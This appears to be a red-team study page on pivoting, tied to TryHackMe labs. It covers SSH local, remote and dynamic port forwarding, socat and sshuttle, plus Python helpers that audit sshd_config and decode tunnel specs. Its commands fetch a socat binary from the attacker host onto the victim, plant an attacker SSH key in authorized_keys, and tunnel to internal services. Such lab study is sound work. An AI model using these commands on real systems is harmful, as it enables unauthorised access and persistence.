# Lateral Movement and Pivoting

## SSH Proxy Chaining

### SSH Local Port Forwarding

**Examples**

[Game Zone](/red-team/walkthroughs/tryhackme/game-zone.md), [Internal](/red-team/walkthroughs/tryhackme/internal.md), [Kitty](/red-team/walkthroughs/tryhackme/kitty.md)

**Local port forwarding** allows us to "pull" a port from an SSH server into the SSH client. In our scenario, this could be used to take any service available in our attacker's machine and make it available through a port on PC-1. That way, any host that can't connect directly to the attacker's PC but can connect to PC-1 will now be able to reach the attacker's services through the pivot host.

Using this type of port forwarding would allow us to run reverse shells from hosts that normally wouldn't be able to connect back to us or simply make any service we want available to machines that have no direct connection to us.

<figure><img src="/files/G5efB6Sh7QnN5FaitNMK" alt=""><figcaption></figcaption></figure>

This lets us reach, from Kali, a service listening on port 10000 that was previously only accessible to the victim from their own machine: the victim's local port 10000 is pulled onto port 10000 of Kali.

**Kali**

```
ssh -L 10000:localhost:10000 $USERNAME@$VICTIM
Password: $PASSWORD
```

### SSH Remote Port Forwarding

**Examples**

[Lateral Movement and Pivoting](/red-team/walkthroughs/tryhackme/lateral-movement-and-pivoting.md#ssh-remote-port-forwarding), [Linux: Local Enumeration](/red-team/walkthroughs/tryhackme/linux-local-enumeration.md#bonus-port-forwarding)

In our example, let's assume that firewall policies block the attacker's machine from directly accessing port 3389 on the server. If the attacker has previously compromised PC-1 and, in turn, PC-1 has access to port 3389 of the server, it can be used to pivot to port 3389 using remote port forwarding from PC-1. **Remote port forwarding** allows you to take a reachable port from the SSH client (in this case, PC-1) and project it into a **remote** SSH server (the attacker's machine).

As a result, a port will be opened in the attacker's machine that can be used to connect back to port 3389 in the server through the SSH tunnel. PC-1 will, in turn, proxy the connection so that the server will see all the traffic as if it was coming from PC-1:

<figure><img src="/files/au4Jzrauesl3W2fiWnrT" alt=""><figcaption></figcaption></figure>

Referring to the previous image, to forward port 3389 on the server back to our attacker's machine, we can use the following command on PC-1:

<figure><img src="/files/HErUwe2OAqWG6kFEHYqS" alt=""><figcaption></figcaption></figure>

**Kali**

```
useradd tunneluser
passwd tunneluser
```

**/etc/ssh/sshd\_config**

If the tunnel isn't working, it may be because these settings aren't enabled in `sshd_config` on the SSH server side (Kali here):

```
AllowTcpForwarding yes
GatewayPorts yes
```
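The two directives above are also what a defender audits when deciding whether a host could be used as a tunnel endpoint. The following is an added example (not from the original page) that computes the setting sshd actually applies from a constructed `sshd_config` sample; the function names are my own.

```python
# Added example (not from the original page). Computes the setting sshd will
# actually apply: the FIRST value for a keyword wins, keywords are case-
# insensitive, and unset keywords fall back to the defaults below
# (AllowTcpForwarding yes, GatewayPorts no). 'Match' blocks are conditional.
import re

DEFAULTS = {"allowtcpforwarding": "yes", "gatewayports": "no"}

def effective_forwarding(config_text):
    """Return {'global': {...}, 'match': [(condition, {...}), ...]}."""
    global_seen, match_blocks, current = {}, [], None
    for raw in config_text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop comments
        if not line:
            continue
        parts = re.split(r"[\s=]+", line, maxsplit=1)  # 'Key value' or 'Key=value'
        key = parts[0].lower()
        value = parts[1].strip().lower() if len(parts) > 1 else ""
        if key == "match":  # everything below applies only to this condition
            current = (value, {})
            match_blocks.append(current)
            continue
        if key not in DEFAULTS:
            continue
        target = global_seen if current is None else current[1]
        target.setdefault(key, value)  # first occurrence wins, as in sshd
    effective = {k: global_seen.get(k, d) for k, d in DEFAULTS.items()}
    return {"global": effective, "match": match_blocks}

def forwarding_risk(config_text):
    """True if remote forwards can be bound to non-loopback interfaces."""
    eff = effective_forwarding(config_text)["global"]
    return eff["allowtcpforwarding"] == "yes" and eff["gatewayports"] in ("yes", "clientspecified")

# Constructed sample: GatewayPorts appears twice; sshd honours the first.
SAMPLE = """\
Port 22
AllowTcpForwarding yes
GatewayPorts yes
GatewayPorts no        # ignored: first occurrence wins
Match User tunneluser
    AllowTcpForwarding no
"""

if __name__ == "__main__":
    print(effective_forwarding(SAMPLE))
    print("exposes tunnels beyond loopback:", forwarding_risk(SAMPLE))
```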

**Victim**

```
ssh tunneluser@$KALI -R 8888:thmdc.za.tryhackme.com:80 -L *:1990:127.0.0.1:1990 -L *:1029:127.0.0.1:1029 -N
```
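Working out which side listens and which side connects for each `-L`/`-R` in a command like the one above is easy to get backwards, whether you are setting up the tunnel or reconstructing one from shell history during an investigation. This added example (not part of the original page; `parse_spec` and `explain_forwards` are my own names) decodes each forward spec of an ssh command line.

```python
# Added example (not part of the original page): decodes each -L/-R option of
# an ssh command so the direction of a tunnel is unambiguous. Spec syntax is
# [bind_address:]port:host:hostport. -L opens the listener on the SSH CLIENT
# (the victim in the command above); -R opens it on the SSH SERVER (Kali).
# Bracketed IPv6 addresses are not handled.
import shlex

def parse_spec(spec):
    """Split '[bind:]port:host:hostport' into (bind, port, host, hostport)."""
    parts = spec.split(":")
    if len(parts) == 3:
        bind, port, host, hostport = None, *parts
    elif len(parts) == 4:
        bind, port, host, hostport = parts
    else:
        raise ValueError("unsupported forward spec: " + spec)
    if bind in ("*", ""):  # '*' or an empty bind address means every interface
        bind = "0.0.0.0"
    return bind, int(port), host, int(hostport)

def explain_forwards(command, client="ssh client", server="ssh server"):
    """Return one human-readable line per -L/-R option in an ssh command."""
    argv, out, i = shlex.split(command), [], 0
    while i < len(argv):
        arg = argv[i]
        if arg in ("-L", "-R"):                          # separate form: -L spec
            spec, i = argv[i + 1], i + 1
        elif arg[:2] in ("-L", "-R") and len(arg) > 2:  # attached form: -Lspec
            spec, arg = arg[2:], arg[:2]
        else:
            i += 1
            continue
        bind, port, host, hostport = parse_spec(spec)
        listener, target = (client, server) if arg == "-L" else (server, client)
        # -R listeners default to loopback on the server; GatewayPorts there
        # decides whether a wildcard bind is honoured.
        note = " (subject to GatewayPorts on the server)" if arg == "-R" else ""
        out.append(f"{listener} listens on {bind or '127.0.0.1'}:{port}{note}"
                   f" -> {target} connects to {host}:{hostport}")
        i += 1
    return out

if __name__ == "__main__":
    cmd = "ssh tunneluser@$KALI -R 8888:thmdc.za.tryhackme.com:80 -L *:1990:127.0.0.1:1990 -N"
    for line in explain_forwards(cmd, client="victim", server="kali"):
        print(line)
```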

## Socat

If there is a website running on port 6666 that is only reachable locally on the victim's side, we can forward it so we can see it on Kali. The following lets us browse that website from our Kali instance on port 7777.

**Examples**

[magician](/red-team/walkthroughs/tryhackme/magician.md#port-forwarding-and-finding-flag), [Linux: Local Enumeration](/red-team/walkthroughs/tryhackme/linux-local-enumeration.md#bonus-port-forwarding)

**Kali**

```
wget https://github.com/aledbf/socat-static-binary/releases/download/v0.0.1/socat-linux-amd64
python2 -m SimpleHTTPServer 81
```

**Victim**

```
cd /tmp
wget http://$KALI:81/socat-linux-amd64
chmod +x socat-linux-amd64
./socat-linux-amd64 tcp-listen:7777,reuseaddr,fork tcp:localhost:6666
```

## sshuttle

**Examples**

[Internal](/red-team/walkthroughs/tryhackme/internal.md)

**Kali**

```
apt install sshuttle
sshuttle -r $USERNAME@$VICTIM 127.0.0.1/24
Password: $PASSWORD
```

### SSH

**Examples**

[Chill Hack](/red-team/walkthroughs/tryhackme/chill-hack.md), [VulnNet: Internal](/red-team/walkthroughs/tryhackme/vulnnet-internal.md)

**Kali**

```
ssh-keygen -t rsa
cat /root/.ssh/id_rsa.pub
```

**Victim**

Copy the contents of `id_rsa.pub` from Kali and append them to the victim's `authorized_keys` file:

```
mkdir -p /home/$VICTIM/.ssh
echo "<paste id_rsa.pub contents from Kali>" >> /home/$VICTIM/.ssh/authorized_keys
```

**Kali**

```
vi /etc/proxychains.conf
```

**proxychains.conf**

```
socks4 	127.0.0.1 9050
```

**Kali**

```
ssh -D 9050 $USERNAME@$VICTIM
```

<figure><img src="/files/XigWFOFHIRR5wMUU8nAx" alt=""><figcaption></figcaption></figure>

I can now see the webpage from Kali, but I have no login credentials to use.

<figure><img src="/files/FU2reWhx3wZSYczlCWxm" alt=""><figcaption></figcaption></figure>
